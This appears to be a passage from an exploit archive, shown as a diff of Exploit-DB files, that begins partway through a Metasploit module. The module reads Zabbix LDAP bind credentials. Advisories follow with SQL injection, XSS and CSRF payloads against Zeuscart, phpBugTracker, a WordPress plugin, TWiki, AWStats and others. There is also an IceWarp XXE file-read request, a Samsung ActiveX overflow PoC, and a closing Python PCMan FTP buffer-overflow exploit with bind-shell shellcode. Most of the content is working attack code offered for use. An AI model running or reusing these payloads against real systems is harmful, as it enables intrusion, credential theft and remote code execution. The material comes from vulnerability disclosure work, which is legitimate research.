'Author' => [ '@pablogonzalezpe, Pablo Gonzalez' ]
))
register_options([
OptString.new('zbx_session', [true, 'Cookie zbx_sessionid']),
OptString.new('TARGETURI', [true, 'Path Zabbix Authentication','/zabbix/authentication.php']),
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
], self.class)
end
def run
req
end
def req
resp = send_request_cgi(
{
'host' => datastore['RHOST'],
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s),
'cookie' => "zbx_sessionid=#{datastore['zbx_session']}",
'content-type' => 'application/x-www-form-urlencoded'
}, datastore['TIMEOUT'])
ldap_host(resp)
user_passDomain(resp)
user_zabbix(resp)
end
def ldap_host(response)
cut = response.body.split("ldap_host\" value=\"")[1]
if cut != nil
host = cut.split("\"")[0]
print_good "LDAP Host => #{host}"
end
end
def user_passDomain(response)
cut = response.body.split("ldap_bind_dn\" value=\"")[1]
if cut != nil
user = cut.split("\"")[0]
print_good "User Domain? => #{user}"
end
cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1]
if cut != nil
pass = cut.split("\"")[0]
print_good "Password Domain? => #{pass}"
end
end
def user_zabbix(response)
cut = response.body.split("user\" value=\"")[1]
if cut != nil
user = cut.split("\"")[0]
print_good "User Zabbix => #{user}"
end
end
end

146
platforms/php/webapps/36159.txt Executable file
View file

@ -0,0 +1,146 @@
Advisory: Multiple reflecting XSS-, SQLi and
InformationDisclosure-vulnerabilities in Zeuscart v.4
Advisory ID: SROEADV-2015-12
Author: Steffen Rösemann
Affected Software: Zeuscart v.4
Vendor URL: http://zeuscart.com/
Vendor Status: pending
CVE-ID: will asked to be assigned after release on FullDisclosure via
OSS-list
Software used for research: Mac OS X 10.10, Firefox 35.0.1
==========================
Vulnerability Description:
==========================
ECommerce-Shopping Cart Zeuscart v. 4 suffers from multiple XSS-, SQLi- and
InformationDisclosure-vulnerabilities.
==================
Technical Details:
==================
====
XSS
===
Reflecting XSS-vulnerabilities can be found in a common
Zeuscart-installation in the following locations and could be exploited for
example by crafting a link and make a registered user click on that link.
The parameter "search", which is used in the index.php is vulnerable to
XSS-attacks.
Exploit-Example:
http://
{TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!--
By appending arbitrary HTML- and/or JavaScript-code to the parameter
"schltr" which is as well used in index.php, an attacker could exploit this
XSS-vulnerable parameter:
Exploit-Example:
http://
{TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E
The third XSS-vulnerability can be found in the "brand"-parameter, which is
again used in index.php.
Exploit-Example:
http://
{TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E
====
SQLi
====
The SQL injection-vulnerabilities can be found in the administrative
backend of Zeuscart v. 4 and reside in the following locations in a common
installation.
By appending arbitrary SQL statements to the "id"-parameter, an attacker
could exploit this SQL injection vulnerability:
Exploit-Example:
http://
{TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+
Another SQL injection vulnerability can be found here and can be exploited
by appending SQL statements to the vulnerable "cid"-parameter:
Exploit-Example:
http://
{TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+
The last SQL injection vulnerability I found can be found in the following
location and can be exploited by appending SQL statements to the vulnerable
"id" parameter:
http://
{TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+
==============
Information Disclosure
==============
The administrative backend of Zeuscart v. 4 allows the admin to use a
functionality, which displays the PHP-installation settings via phpinfo():
http://{TARGET}/admin/?do=getphpinfo
Unfortunately, the PHP-script does not check, if an authorized admin
executes this functionality: It is possible even for unregistered users to
request the above link to see the informations, phpinfo() displays. That
could expose sensitive informations to an attacker which could lead to
further exploitation.
=========
Solution:
=========
Vendor has been notified. After releasing a patch, which seems not to
correct the issues, the vendor decided not to respond anymore to figure out
a solution together. Currently, there is no patch available to secure
Zeuscart-installations.
====================
Disclosure Timeline:
====================
21-Jan-2015 found the vulnerabilities
21-Jan-2015 - informed the developers (see [3])
21-Jan-2015 release date of this security advisory [without technical
details]
21-Jan-2015 fork of the repository to keep the vulnerable version
available for other researchers (see [5])
22-Jan-2015 - vendor responded, provided detailed information
04-Feb-2015 - vendor patches Bin/Core/Assembler.php; vulnerabilities are
still exploitable, which has been reported to the vendor (see [3])
19-Feb-2015 - asked the vendor again, if he will patch these issues (see
[3]); vendor did not respond
21-Feb-2015 - release date of this security advisory
21-Feb-2015 - send to FullDisclosure
========
Credits:
========
Vulnerabilities found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] http://zeuscart.com/
[2] https://github.com/ZeusCart/zeuscart
[3] https://github.com/ZeusCart/zeuscart/issues/28
[4] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-12.html
[5] https://github.com/sroesemann/zeuscart

257
platforms/php/webapps/36160.txt Executable file
View file

@ -0,0 +1,257 @@
Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in
phpBugTracker v.1.6.0
Advisory ID: SROEADV-2015-16
Author: Steffen Rösemann
Affected Software: phpBugTracker v.1.6.0
Vendor URL: https://github.com/a-v-k/phpBugTracker
Vendor Status: patched
CVE-ID: will asked to be assigned after release on FullDisclosure via
OSS-list
Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31
==========================
Vulnerability Description:
==========================
The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-,
stored/reflected XSS- and CSRF-vulnerabilities.
==================
Technical Details:
==================
The following files used in a common phpBugTracker installation suffer from
different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities:
===========
project.php
===========
SQL injection / underlaying CSRF vulnerability in project.php via id
parameter:
http://
{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+
Stored XSS via input field "project name":
http://{TARGET}/admin/project.php?op=add
executed in: e.g. http://{TARGET}/admin/project.php, http://
{TARGET}/index.php
========
user.php
========
Reflecting XSS in user.php via use_js parameter:
http://
{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1
executed in: same page
=========
group.php
=========
Reflecting XSS in group.php via use_js parameter:
http://
{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1
executed in: same page
(Blind) SQL Injection / underlaying CSRF vulnerability in group.php via
group_id parameter (used in different operations):
http://
{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
http://
{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+
==========
status.php
==========
SQL injection / underlaying CSRF vulnerability in status.php via status_id
parameter:
http://
{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
Stored XSS via input field "Description":
http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0
executed in: e.g. http://{TARGET}/admin/status.php
CSRF vulnerability in status.php (delete statuses):
<img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}"
==============
resolution.php
==============
SQL injection / underlaying CSRF vulnerability in resolution.php via
resolution_id parameter:
http://
{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+
CSRF vulnerability in resolution.php (delete resolutions):
<img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}"
============
severity.php
============
SQL injection / underlaying CSRF vulnerability in severity.php via
severity_id parameter:
http://
{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
CSRF vulnerability in severity.php (delete severities):
<img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}"
Stored XSS in severity.php via input field "Description":
http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0
executed in: e.g. http://{TARGET}/admin/severity.php
============
priority.php
============
SQL injection / underlaying CSRF vulnerability in priority.php via
priority_id parameter:
http://
{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+
======
os.php
======
SQL Injection / underlaying CSRF vulnerability in os.php via os_id
parameter:
http://
{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+
CSRF vulnerability in os.php (delete operating systems):
<img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" >
Stored XSS vulnerability in os.php via input field "Regex":
http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0
executed in: e.g. http://{TARGET}/admin/os.php?
============
database.php
============
SQL injection / underlaying CSRF vulnerability in database.php via
database_id:
http://
{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+
CSRF vulnerability in database.php (delete databases):
<img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}"
Stored XSS vulnerability in database.php via input field "Name":
http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0
========
site.php
========
CSRF vulnerability in site.php (delete sites):
<img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" >
SQL injection / underlaying CSRF vulnerability in site.php via site_id
parameter:
http://
{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+
=======
bug.php
=======
This issue has already been assigned CVE-2004-1519, but seems to have not
been corrected since the assignment:
SQL injection / underlaying CSRF vulnerability in bug.php via project
parameter:
http://
{TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+
For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519.
=========
Solution:
=========
Update to version 1.7.0.
====================
Disclosure Timeline:
====================
03/05-Feb-2015 found the vulnerabilities
05-Feb-2015 - informed the developers (see [3])
05-Feb-2015 release date of this security advisory [without technical
details]
05-Feb-2015 - forked the Github repository, to keep it available for other
security researchers (see [4])
05/06-Feb-2015 - vendor replied, will provide a patch for the
vulnerabilities
09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical
details will be released on 19th February 2015
19-Feb-2015 - release date of this security advisory
19-Feb-2015 - send to FullDisclosure
========
Credits:
========
Vulnerabilities found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] https://github.com/a-v-k/phpBugTracker
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html
[3] https://github.com/a-v-k/phpBugTracker/issues/4
[4] https://github.com/sroesemann/phpBugTracker

63
platforms/php/webapps/36161.txt Executable file
View file

@ -0,0 +1,63 @@
====================================================
Product: Easy Social Icons WordPress plugin
Vendor: CyberNetikz
Tested Version: 1.2.2
Vulnerability Type: XSS [CWE-79] and CSRF [CWE-352]
Risk Level: Medium
Solution Status: Solved in version 1.2.3
Discovered and Provided: Eric Flokstra - ITsec Security Services
====================================================
[-] About the Vendor:
Easy Social Icons is a WordPress plugin and can be used to set icons on the public page in order to link to social media platforms such as LinkedIn, Twitter or Facebook.
[-] Advisory Details:
It is discovered that insufficient validation is performed on the 'image_file' parameter enabling arbitrary JavaScript to be injected. On top of that no random tokens are used to prevent CSRF attacks. By combining these vulnerabilities an attacker could for example trick an admin into setting a persistent XSS payload on the public WordPress page.
[-] Proof of Concept:
<html>
<body>
<form action="http://10.0.2.215/wordpress/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1" <http://10.0.2.215/wordpress/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1> method="POST" enctype="multipart/form-data">
<input type="hidden" name="title" value="Example" />
<input type="hidden" name="image&#95;file" value="http&#58;&#47;&#47;10&#46;0&#46;2&#46;215&#47;wordpress&#47;wp&#45;content&#47;uploads&#47;2015&#47;02&#47;cookie&#46;jpg"><script>alert&#40;1&#41;<&#47;script>" />
<input type="hidden" name="url" value="http&#58;&#47;&#47;www&#46;example&#46;org" />
<input type="hidden" name="sortorder" value="0" />
<input type="hidden" name="target" value="1" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="submit&#95;button" value="Save&#32;Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
[-] Disclosure Timeline:
[02 Feb 2015]: Vendor notification
[02 Feb 2015]: Vulnerability confirmation
[11 Feb 2015]: Vulnerability patched
[19 Feb 2015]: Public disclosure
[-] Solution:
Update to the latest version of Easy Social Icons.
[-] References:
[1] Easy Social Icons Changelog -- https://wordpress.org/plugins/easy-social-icons/changelog/
[2] Common Weakness Enumeration (CWE) -- http://cwe.mitre.org
[3] ITsec Security Services BV -- http://www.itsec.nl
------------------------------------------------------------------------
ITsec Security Services bv. (KvK. 34181927)
Postal Address:
P.O. Box 5120, 2000GC Haarlem
Visitors Address:
Kenaupark 23, 2011 MR Haarlem
Phone: +31 - (0)23 542 05 78
The information contained in this email communication is confidential and is intended solely for the use of the individual or entity to whom it is addressed and others authorized to receive it. If you are not the intended recipient, you are hereby notified that any disclosure, copying,distribution, or taking any action in reliance of the contents of this information is strictly prohibited and may be unlawful. No rights may be attached to this message. ITsec does not accept any liability for incorrect and incomplete transmission or delayed receipt of this e-mail nor for the effects or damages caused by the direct or indirect use of the information or functionality provided by this posting, nor the content contained within.Use them at your own risk.

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49746/info
TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to TWiki 5.1.0 are vulnerable.
http://example.com/do/view/Main/Jump?create=on&newtopic=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%280x0051D1%29%3C/script%3E&template=WebCreateNewTopic&topicparent=3

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49746/info
TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to TWiki 5.1.0 are vulnerable.
http://example.com/do/view/TWiki/ATasteOfTWiki?&#039;"--></style></script><script>alert(0x002B48)</script>

10
platforms/php/webapps/36164.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/49749/info
AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
AWStats 7.0 and 6.95 are vulnerable; other versions may also be affected.
http://example.com/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://example.com/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E

54
platforms/php/webapps/36165.txt Executable file
View file

@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/49753/info
IceWarp Web Mail is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to gain access to potentially sensitive information, and possibly cause denial-of-service conditions; other attacks may also be possible.
Proof-of-Concept:
The following POST request was sent to the host A.B.C.D where the IceWarp mail
server was running:
REQUEST
=========
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
Host:A.B.C.D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:en-gb,en;q=0.5i've
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D
Content-Length: 249
Content-Type: application/xml;
charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache
<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq
type="set"><query xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffcd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method></query></iq>
RESPONSE:
==========
HTTP/1.1 200 OK
Server: IceWarp/9.4.2
Date: Wed, 20 Jul
2011 10:04:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml
Vary: Accept-Encoding
Content-Length: 1113
<?xml version="1.0" encoding="utf-8"?><iq type="error"><error
uid="login_invalid">test; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
....TRUNCATED

42
platforms/php/webapps/36166.txt Executable file
View file

@ -0,0 +1,42 @@
source: http://www.securityfocus.com/bid/49765/info
Multiple products are prone to an HTML-injection vulnerability because they fail to sufficiently sanitize user-supplied input.
An attacker could exploit this vulnerability to execute arbitrary script code in the browser of an unsuspecting victim in the context of the affected websites. This may allow the attacker to steal cookie-based authentication credentials or control how the websites are rendered to the user. Other attacks are also possible.
The following products are affected:
WordPress 3.1.4
BuddyPress 1.2.10
Blogs MU 1.2.6
One of the functionalities of Zyncro is the possibility of creating
groups. The name and description of the groups are not correctly
sanitized and it's possible to provoke some attacks.
In order to do the attack, you must create a new group and capture the
packet transferred to the server to modify it because validation is
done in client-side (only) using javascript.
The original request has three POST data parameters like:
popup=1 & name=dGVzdA%3D%3D & description=dGVzdA%3D%3D
Important data are 'name' and 'description' parameters, which are
base64 encoded. In this case, both values are 'test':
url_decode(dGVzdA%3D%3D)
b64decode(dGVzdA==)
test
It is possible to provoke the XSS by changing those values as follows:
"><script>alert("XSS attack")</script>
Values MUST be in base64, so:
b64encode(""><script>alert("XSS attack")</script>") =
Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4=
Finally the post-data of the request would become:
popup=1&name=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d&description=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d
Once the request has reached the server, a new group would be created
and any time that someone sees the name/description of the group, a
pop-up would appear, this is the easiest attack.

16
platforms/php/webapps/36167.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/49769/info
AdaptCMS is prone to multiple cross-site scripting vulnerabilities and an information disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
AdaptCMS 2.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/AdaptCMS/admin.php?view=[XSS]
http://www.example.com/AdaptCMS/admin.php?view=share&do=[XSS]
http://www.example.com/AdaptCMS//index.php?'[XSS]
http://www.example.com/AdaptCMS/admin.php?view=/&view=settings
http://www.example.com/AdaptCMS/admin.php?view=/&view=users
http://www.example.com/AdaptCMS/admin.php?view=/&view=groups
http://www.example.com/AdaptCMS/admin.php?view=/&view=levels
http://www.example.com/AdaptCMS/admin.php?view=/&view=stats

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49771/info
Serendipity Freetag-plugin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Serendipity Freetag-plugin 3.22; prior versions may also be affected.
http://www.example.com/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=managetags&serendipity[tagview]=[xss]

112
platforms/windows/dos/36152.html Executable file
View file

@ -0,0 +1,112 @@
<!--
# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
# Date: 22/02/2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx
# Version: Samsung iPOLiS 1.12.2
# Tested on: Windows 7 Ultimate N SP1
# CVE: 2015-0555
-->
<html>
<!--
Vulnerability found and PoC coded by Praveen Darshanam
http://blog.disects.com
CVE-2015-0555
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long"
memberName = "WriteConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
Operating System = Windows 7 Ultimate N SP1
Vulnerable Software = Samsung iPOLiS 1.12.2
CERT tried to coordinate but there wasn't any response from Samsung
-->
<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
var arg1 = "";
var arg2="praveend";
for (i=0; i<= 15000; i++)
{
arg1 += "A";
}
target.WriteConfigValue(arg1 ,arg2);
</script>
</html>
<!--
#############Stack Trace####################
Exception Code: ACCESS_VIOLATION
Disasm: 149434 MOV AL,[ESI+EDX]
Seh Chain:
--------------------------------------------------
1 647C7D7D mfc100.dll
2 647D0937 mfc100.dll
3 64E242CA VBSCRIPT.dll
4 77B3E0ED ntdll.dll
Called From Returns To
--------------------------------------------------
XNSSDKDEVICE.149434 41414141
41414141 414141
414141 3DA4C4
3DA4C4 mfc100.647790C1
mfc100.647790C1 56746C75
Registers:
--------------------------------------------------
EIP 00149434
EAX 00003841
EBX 00609FB0 -> 0015A564
ECX 00003814
EDX 00414141
EDI 0000008F
ESI 0000008F
EBP 002BE5FC -> Asc: AAAAAAAAAAA
ESP 002BE564 -> 0000000C
Block Disassembly:
--------------------------------------------------
149423 XOR EDI,EDI
149425 XOR ESI,ESI
149427 MOV [EBP-8C],ECX
14942D TEST ECX,ECX
14942F JLE SHORT 00149496
149431 MOV EDX,[EBP+8]
149434 MOV AL,[ESI+EDX] <--- CRASH
149437 CMP AL,2F
149439 JNZ SHORT 00149489
14943B MOV ECX,EBX
14943D TEST ESI,ESI
14943F JNZ SHORT 0014944D
149441 PUSH 159F28
149446 CALL 0014F7C0
14944B JMP SHORT 00149476
ArgDump:
--------------------------------------------------
EBP+8 00414141
EBP+12 003DA4C4 -> Asc: defaultV
EBP+16 647790C1 -> EBE84589
EBP+20 FFFFFFFE
EBP+24 646CBE5C -> CCCCCCC3
EBP+28 0000001C
Stack Dump:
--------------------------------------------------
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................]
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
-->

View file

@ -0,0 +1,51 @@
Realtek 11n Wireless LAN utility privilege escalation.
Vulnerability Discovered by Humberto Cabrera @dniz0r
http://zeroscience.mk @zeroscience
Summary:
? Realtek 11n Wireless LAN utility is deployed and used by realtek
alfa cards and more in order to help diagnose and view wireless card
properties.
Description:
- Unquoted Privilege escalation that allows a user to gain SYSTEM
privileges.
Date - 12 Feb 2015
Version: 700.1631.106.2011
Vendor: www.realtek.com.tw
Advisory URL:
https://eaty0face.wordpress.com/2015/02/13/realtek-11n-wireless-lan-utility-privilege-escalation/
Tested on: Win7
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: realtek11ncu
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\REALTEK\11n USB Wireless LAN
Utility\RtlService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Realtek11nCU
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Windows\system32>sc qc realtek11nsu
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: realtek11nsu
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\REALTEK\Wireless LAN
Utility\RtlService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Realtek11nSU
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

View file

@ -0,0 +1,58 @@
# Title: PCMan FTP Server v2.0.7 Buffer Overflow - MKD Command
# Date : 12/02/2015
# Author: R-73eN
# Software: PCMan FTP Server v2.0.7
# Tested On Windows Xp SP3
import socket
#348 Bytes Bind Shell Port TCP/4444
shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80"
shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98"
shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7"
shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0"
shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82"
shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0"
shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6"
shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d"
shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32"
shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90"
shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5"
shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71"
shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2"
shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f"
shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14"
shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec"
shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88"
shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79"
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = raw_input('Enter IP : ')
s.connect((server, 21))
a = s.recv(1024)
print ' [+] ' + a
s.send('User anonymous')
s.recv(1024)
s.send('pass')
s.recv(1024)
print ' [+] Logged in as Anonymous ...'
evil = 'A' * 2007 #JUNK
evil += '\x65\x82\xA5\x7C' # EIP overwrite jmp esp / shell32.dll
evil += '\x90' * 10
evil += shellcode
print ' [+] Sending Payload ...'
s.send('mkd ' + evil)
print ' [+] You got shell .....\n telnet ' + server + ' 4444'